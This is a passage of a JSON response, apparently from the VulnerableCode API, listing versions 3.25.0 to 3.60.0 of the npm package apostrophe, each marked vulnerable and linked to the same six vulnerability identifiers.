ility":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.25.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988963?format=json","purl":"pkg:npm/apostrophe@3.26.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.26.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988964?format=json","purl":"pkg:npm/apostrophe@3.26.1-alpha.2022081201","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.26.1-alpha.2022081201"},{"url":"http://public2.vulnerablecode.io/api/packages/988965?format=json","purl":"pkg:npm/apostrophe@3.26.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.26.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988966?format=json","purl":"pkg:npm/apostrophe@3.27.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.27.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988967?format=json","purl":"pkg:npm/apostrophe@3.28.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.28.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988968?format=json","purl":"pkg:npm/apostrophe@3.28.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.28.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988969?format=json","purl":"pkg:npm/apostrophe@3.29.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.29.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988970?format=json","purl":"pkg:npm/apostrophe@3.29.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.29.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988971?format=json","purl":"pkg:npm/apostrophe@3.30.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.30.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988972?format=json","purl":"pkg:npm/apostrophe@3.31.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.31.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988973?format=json","purl":"pkg:npm/apostrophe@3.32.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.32.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988974?format=json","purl":"pkg:npm/apostrophe@3.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.33.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988975?format=json","purl":"pkg:npm/apostrophe@3.34.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.34.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988976?format=json","purl":"pkg:npm/apostrophe@3.35.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.35.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988977?format=json","purl":"pkg:npm/apostrophe@3.36.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.36.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988978?format=json","purl":"pkg:npm/apostrophe@3.37.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.37.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988979?format=json","purl":"pkg:npm/apostrophe@3.38.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.38.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988980?format=json","purl":"pkg:npm/apostrophe@3.38.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.38.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988981?format=json","purl":"pkg:npm/apostrophe@3.39.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.39.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988982?format=json","purl":"pkg:npm/apostrophe@3.39.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.39.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988983?format=json","purl":"pkg:npm/apostrophe@3.39.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.39.2"},{"url":"http://public2.vulnerablecode.io/api/packages/988984?format=json","purl":"pkg:npm/apostrophe@3.40.0-alpha","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.40.0-alpha"},{"url":"http://public2.vulnerablecode.io/api/packages/988985?format=json","purl":"pkg:npm/apostrophe@3.40.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.40.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988986?format=json","purl":"pkg:npm/apostrophe@3.40.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.40.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988987?format=json","purl":"pkg:npm/apostrophe@3.40.2-alpha","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.40.2-alpha"},{"url":"http://public2.vulnerablecode.io/api/packages/988988?format=json","purl":"pkg:npm/apostrophe@3.41.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.41.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988989?format=json","purl":"pkg:npm/apostrophe@3.41.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.41.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988990?format=json","purl":"pkg:npm/apostrophe@3.42.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.42.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988991?format=json","purl":"pkg:npm/apostrophe@3.43.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.43.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988992?format=json","purl":"pkg:npm/apostrophe@3.44.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.44.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988993?format=json","purl":"pkg:npm/apostrophe@3.45.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.45.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988994?format=json","purl":"pkg:npm/apostrophe@3.45.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.45.1"},{"url":"http://public2.vulnerablecode.io/api/packages/988995?format=json","purl":"pkg:npm/apostrophe@3.46.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.46.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988996?format=json","purl":"pkg:npm/apostrophe@3.47.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.47.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988997?format=json","purl":"pkg:npm/apostrophe@3.48.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.48.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988998?format=json","purl":"pkg:npm/apostrophe@3.49.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.49.0"},{"url":"http://public2.vulnerablecode.io/api/packages/988999?format=json","purl":"pkg:npm/apostrophe@3.50.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.50.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989000?format=json","purl":"pkg:npm/apostrophe@3.51.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.51.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989001?format=json","purl":"pkg:npm/apostrophe@3.51.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.51.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989002?format=json","purl":"pkg:npm/apostrophe@3.52.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.52.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989003?format=json","purl":"pkg:npm/apostrophe@3.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.53.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989004?format=json","purl":"pkg:npm/apostrophe@3.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.54.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989005?format=json","purl":"pkg:npm/apostrophe@3.55.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.55.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989006?format=json","purl":"pkg:npm/apostrophe@3.55.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.55.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989007?format=json","purl":"pkg:npm/apostrophe@3.56.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.56.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989008?format=json","purl":"pkg:npm/apostrophe@3.57.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.57.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989009?format=json","purl":"pkg:npm/apostrophe@3.58.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.58.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989010?format=json","purl":"pkg:npm/apostrophe@3.58.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.58.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989011?format=json","purl":"pkg:npm/apostrophe@3.59.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.59.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989012?format=json","purl":"pkg:npm/apostrophe@3.59.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@3.59.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989013?format=json","purl":"pkg:npm/apostrophe@3.60.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/p